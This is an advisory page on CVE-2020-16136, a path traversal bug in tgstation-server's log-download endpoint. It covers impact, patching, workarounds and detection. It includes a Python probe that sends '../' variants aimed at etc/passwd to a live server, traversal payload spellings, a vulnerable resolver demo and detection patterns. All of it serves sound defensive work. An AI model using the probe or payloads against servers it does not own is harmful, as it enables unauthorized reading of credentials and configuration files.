CVE-2020-16136

7.7 HIGH

📋 TL;DR

This vulnerability allows an authenticated tgstation-server user who holds the 'Download logs' permission to place '../' sequences in the requested log name and download any file readable by the account the server process runs as. It affects tgstation-server 4.4.0 and 4.4.1; an attacker needs valid credentials for an account with that permission, nothing more.

💻 Affected Systems

Products:
  • tgstation-server
Versions: 4.4.0 and 4.4.1
Operating Systems: All platforms running tgstation-server
Default Config Vulnerable: ⚠️ Yes
Notes: Requires an authenticated user holding the 'Download logs' permission. The endpoint returns one named file, so the attacker cannot list directories through it, but can request known or guessable paths (service configuration, key files) directly.

📦 What is this software?

tgstation-server (TGS) is the open-source server-management suite used by Space Station 13 communities to host BYOND game servers. It exposes a REST API and a web control panel through which administrators manage instances, deployments and logs; the log-download function of that API is where this flaw lives.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Full server compromise: the attacker reads configuration files, SSH keys or database credentials that the service account can open and uses them to escalate privileges or move laterally to other hosts.

🟠 Likely Case

Disclosure of server files the service account can read: configuration data, credentials and other proprietary information. The flaw is read-only; it does not by itself let the attacker write files or execute code.

🟢 If Mitigated

Limited impact if the service runs under a dedicated account and file-system permissions keep it from reading anything beyond its own data, though information the service itself needs (its configuration, its logs) can still be disclosed.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

The traversal itself is trivial: '../' sequences in the requested log name, sent with an ordinary authenticated request. The only barrier is obtaining an account that holds the 'Download logs' permission.
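The class of bug and the check that closes it, as an added illustration in Python. This is not tgstation-server's code (the project is written in C#) and not its actual fix; the file names and directory layout below are constructed for the example. The hardened resolver resolves both the log directory and the candidate path before testing containment, which is what makes '../' chains, rooted inputs and symlinked escapes all fail the same test.

```python
"""Vulnerable vs. hardened resolution of a user-supplied log name."""
from pathlib import Path
import os
import tempfile


def resolve_log_vulnerable(logs_dir: str, requested: str) -> str:
    """Naive join: '../' segments in `requested` walk straight out of logs_dir."""
    return os.path.normpath(os.path.join(logs_dir, requested))


def resolve_log_hardened(logs_dir: str, requested: str) -> str:
    """Return the on-disk path for `requested` only if it lies inside logs_dir.

    Both sides are fully resolved (symlinks included) before the containment
    test, so '../' chains, rooted inputs and symlinked escapes are rejected by
    one check instead of each needing its own special case.
    """
    base = Path(logs_dir).resolve()
    if Path(requested).is_absolute():
        raise PermissionError(f"rooted path rejected: {requested!r}")
    candidate = (base / requested).resolve()
    if base not in candidate.parents:  # must be strictly inside the log dir
        raise PermissionError(f"path escapes the log directory: {requested!r}")
    return str(candidate)


def accepts(logs_dir: str, requested: str) -> bool:
    """Convenience wrapper: does the hardened resolver admit `requested`?"""
    try:
        resolve_log_hardened(logs_dir, requested)
        return True
    except PermissionError:
        return False


def demo() -> dict:
    """Lay out a throwaway tree and run both resolvers over a legitimate and a
    traversing request. Every file and value here is constructed for the demo."""
    root = Path(tempfile.mkdtemp())
    logs = root / "Logs"
    logs.mkdir()
    (logs / "tgs-2020-08-12.log").write_text("[INFO] server started\n")
    # Stand-in for a config file that lives one level above the log directory.
    (root / "appsettings.Production.yml").write_text(
        "ConnectionString: Server=db;Password=example\n")

    legit = "tgs-2020-08-12.log"
    evil = "../appsettings.Production.yml"  # what the attacker asks for
    out = {
        "vulnerable_legit": Path(resolve_log_vulnerable(str(logs), legit)).read_text(),
        # The naive resolver hands back the file outside Logs without complaint.
        "vulnerable_evil": Path(resolve_log_vulnerable(str(logs), evil)).read_text(),
        "hardened_legit": Path(resolve_log_hardened(str(logs), legit)).read_text(),
    }
    try:
        resolve_log_hardened(str(logs), evil)
        out["hardened_evil"] = "ALLOWED"
    except PermissionError:
        out["hardened_evil"] = "BLOCKED"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:17s} {value!r}")
```

Note that URL decoding happens in the web framework before the name reaches code like this, so the resolver sees '../' whether the client sent it plain, percent-encoded or double-encoded; the containment check does not depend on spotting any particular spelling.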

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.4.2 or later

Vendor Advisory: https://github.com/tgstation/tgstation-server/security/advisories/GHSA-r8pp-42wr-2gc4

Restart Required: Yes

Instructions:

1. Back up the current configuration and data.
2. Stop the tgstation-server service.
3. Install version 4.4.2 or later using the same method you used to install it (release download or your deployment tooling).
4. Start the service again.
5. Verify the fix: a normal log download still works, and a request naming a path outside the log directory is rejected.

🔧 Temporary Workarounds

Remove log download permissions (all platforms)

Temporarily revoke the 'Download logs' permission from every user until the patch is applied. The traversal is only reachable through that endpoint, so this closes the hole completely at the cost of log access.

Restrict server process file access (Linux)

Run tgstation-server under a dedicated, unprivileged account and set file-system permissions so that account can read nothing beyond what the service needs. This narrows what a traversal can reach but cannot protect files the service itself must read, such as its own configuration, so it limits rather than removes the exposure.

🧯 If You Can't Patch

  • Revoke the 'Download logs' permission from every account that does not strictly need it, and keep the remaining accounts few and audited.
  • Limit which networks can reach the API, front it with a reverse proxy that logs full request paths, and alert on '..' segments (plain or URL-encoded) in requests to /Administration/Logs/.

🔍 How to Verify

Check if Vulnerable:

Check whether you run tgstation-server 4.4.0 or 4.4.1. On a test instance, an account with the 'Download logs' permission can confirm the bug by requesting a log name containing '../' and seeing whether a file outside the log directory comes back.

Check Version:

Read the version from whichever client you administer the server with (the web control panel, if installed, shows it). If you run it as a systemd unit, systemctl status with your unit name shows the running binary's location; the unit name depends on how you installed it.

Verify Fix Applied:

After updating to 4.4.2 or later, repeat the traversal request against /Administration/Logs/: the server should reject it (an error status and no file body) while a plain log name still downloads.
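A probe for the verification step, added here as an example; it is not tooling from the page or from the tgstation-server project. It assumes the download route /Administration/Logs/<name>, a bearer token you already obtained by logging in with an account that holds the 'Download logs' permission, and an Api version header that the TGS 4 API expects on requests (its exact value is an assumption; set EXTRA_HEADERS to whatever your server requires). Run it only against a server you own.

```python
"""Probe a tgstation-server log-download endpoint for directory traversal."""
import urllib.error
import urllib.parse
import urllib.request

LOG_ENDPOINT = "/Administration/Logs/"
# Assumption: the TGS 4 API wants an Api version header; adjust to your server.
EXTRA_HEADERS = {"Api": "Tgstation.Server.Api/4.4.0"}  # hypothetical value


def traversal_variants(target: str, depth: int = 6) -> list:
    """Path suffixes that try to reach `target` from the log directory.

    `target` is relative to the filesystem root, e.g. 'etc/passwd' or
    'Windows/win.ini'. Plain, URL-encoded and backslash forms are tried
    because decoding and normalisation differ between platforms and proxies.
    """
    up = "../" * depth
    return [
        up + target,                                   # raw dot-dot-slash
        urllib.parse.quote(up + target, safe=""),      # every slash encoded
        ("..%2F" * depth) + target,                    # only the climb encoded
        ("..\\" * depth) + target.replace("/", "\\"),  # Windows separators
    ]


def classify(status: int, body: bytes, marker: bytes) -> str:
    """Verdict for one response.

    A 200 whose body carries `marker` (b'root:' for /etc/passwd) is a leak;
    400/403/404 is the patched behaviour; anything else needs a human look.
    """
    if status == 200 and marker in body:
        return "LEAKED"
    if status in (400, 403, 404):
        return "BLOCKED"
    return "INCONCLUSIVE"


def probe(base_url: str, token: str, target: str, marker: bytes) -> dict:
    """Send each variant and map it to a verdict (needs network access)."""
    verdicts = {}
    headers = {"Authorization": f"Bearer {token}", **EXTRA_HEADERS}
    for variant in traversal_variants(target):
        url = base_url.rstrip("/") + LOG_ENDPOINT + variant
        req = urllib.request.Request(url, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                verdicts[variant] = classify(resp.status, resp.read(), marker)
        except urllib.error.HTTPError as err:
            verdicts[variant] = classify(err.code, err.read(), marker)
    return verdicts


if __name__ == "__main__":
    import sys
    base, tok = sys.argv[1], sys.argv[2]  # e.g. https://tgs.example:5000 <token>
    for variant, verdict in probe(base, tok, "etc/passwd", b"root:").items():
        print(f"{verdict:13s} {variant}")
```

Any LEAKED line means the running build is still vulnerable; a patched 4.4.2+ server should answer every variant with BLOCKED.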

📡 Detection & Monitoring

Log Indicators:

  • HTTP requests to /Administration/Logs/ whose path contains a '..' segment in any spelling: plain '../', URL-encoded '..%2F' (either case), double-encoded '%252e%252e%252f', or backslash forms ('..\', '..%5C') on Windows hosts
  • Several such requests in a short window from the same authenticated user, especially any that returned 200

Network Indicators:

  • HTTP requests with directory traversal patterns in the URL path of the log-download endpoint (the file name is part of the path, not a query parameter)

SIEM Query:

web_access_logs WHERE url_path CONTAINS '/Administration/Logs/' AND (url_path CONTAINS '../' OR url_path CONTAINS '..%2F' OR url_path CONTAINS '..%2f' OR url_path CONTAINS '..\' OR url_path CONTAINS '..%5C' OR url_path CONTAINS '..%5c' OR url_path CONTAINS '%252e%252e')

Notes: Some reverse proxies collapse plain '../' segments before forwarding, so the raw form may appear only in the edge log while encoded forms reach the application; collect both logs and match case-insensitively.
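The detection logic from the indicators above, run over constructed sample access-log lines; this is an added example, not from the page or the project. The lines use a reverse-proxy style format with the authenticated user in the second field; adjust LINE_RE to your proxy's format. The matcher checks the path as sent, once URL-decoded and twice decoded, and treats backslashes as separators.

```python
"""Flag directory-traversal attempts against the log-download endpoint."""
import re
from collections import Counter
from urllib.parse import unquote

LOG_ENDPOINT = "/Administration/Logs/"

# Constructed sample access log (reverse-proxy style), not real traffic.
# Fields: client, authenticated user, timestamp, request line, status, bytes.
SAMPLE_LOG = """\
10.0.0.5 alice [12/Aug/2020:10:01:02 +0000] "GET /Administration/Logs/tgs-2020-08-12.log HTTP/1.1" 200 5120
10.0.0.9 mallory [12/Aug/2020:10:05:40 +0000] "GET /Administration/Logs/../appsettings.Production.yml HTTP/1.1" 200 1033
10.0.0.9 mallory [12/Aug/2020:10:05:52 +0000] "GET /Administration/Logs/..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2011
10.0.0.9 mallory [12/Aug/2020:10:06:07 +0000] "GET /Administration/Logs/%252e%252e%252fsecrets.json HTTP/1.1" 404 0
10.0.0.9 mallory [12/Aug/2020:10:06:30 +0000] "GET /Administration/Logs/..%5Cappsettings.yml HTTP/1.1" 200 900
10.0.0.5 alice [12/Aug/2020:10:07:00 +0000] "GET /Instance/1 HTTP/1.1" 200 300
10.0.0.7 bob [12/Aug/2020:10:08:00 +0000] "GET /Administration/Logs/.../odd-name.log HTTP/1.1" 404 0
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\d+)'
)

# A '..' that stands alone as a path segment, with '/' or '\' as separator.
DOTDOT_SEGMENT = re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")


def has_traversal(raw_path: str) -> bool:
    """True if a '..' segment appears in the path as sent, after one URL
    decode, or after a second decode (double encoding). Backslashes count
    because tgstation-server also runs on Windows."""
    p = raw_path
    for _ in range(3):  # raw, decoded once, decoded twice
        if DOTDOT_SEGMENT.search(p):
            return True
        p = unquote(p)
    return False


def scan(log_text: str) -> list:
    """Return one dict per request that hits the log endpoint with traversal."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        path = m["path"]
        if LOG_ENDPOINT.lower() in path.lower() and has_traversal(path):
            hits.append({"user": m["user"], "client": m["client"], "ts": m["ts"],
                         "path": path, "status": int(m["status"]),
                         "served": m["status"] == "200"})
    return hits


def repeat_offenders(hits: list, threshold: int = 2) -> dict:
    """Users with at least `threshold` traversal attempts, for the
    'multiple attempts from the same authenticated user' indicator."""
    counts = Counter(h["user"] for h in hits)
    return {user: n for user, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        flag = "SERVED " if h["served"] else "blocked"
        print(f"{flag} {h['user']:8s} {h['path']}")
    print("repeat offenders:", repeat_offenders(found))
```

A hit with served set to True on a 4.4.0/4.4.1 server is a confirmed disclosure of whatever file the decoded path names; the same hit on a patched server should carry a 4xx status, and bob's three-dot file name shows why the matcher insists on '..' as a whole segment rather than any pair of dots.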
